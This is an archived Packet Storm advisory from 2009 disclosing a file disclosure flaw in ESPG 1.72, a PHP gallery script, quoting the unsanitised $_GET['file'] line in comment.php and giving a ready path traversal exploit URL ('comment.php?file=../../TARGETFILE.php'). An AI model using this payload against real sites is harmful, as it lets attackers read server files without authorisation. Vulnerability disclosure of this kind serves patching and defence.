ESPG 1.72 File Disclosure

2009-01-21T00:00:00
ID PACKETSTORM:74126
Type packetstorm
Reporter bd0rk
Modified 2009-01-21T00:00:00

Description

                                        
                                            ` .::ESPG 1.72 File Disclosure Vulnerability::.  
  
  
  
=> Scriptname: ESPG (Enhanced Simple PHP Gallery) 1.72  
  
=> Vendor: http://quirm.net  
  
=> Download: http://quirm.net/download/21/  
  
=> Bugfounder: bd0rk  
  
=> Contact: bd0rk[at]hackermail.com  
  
=> Greetings: str0ke, TheJT, Maria, Alucard, x0r_32  
  
=> Vulnerable Code in comment.php line 3  
  
-------------------------  
  
$fileid = $_GET['file'];  
  
-------------------------  
  
  
  
[+]Sploit: http://[t4rg3t]/gallery/comment.php?file=../../TARGETFILE.php  
  
  
###The 20 years old, german Hacker bd0rk###  
  
  
=> 'GAINST WAR IN ISRAEL AND GAZA!!! <=  
  
  
`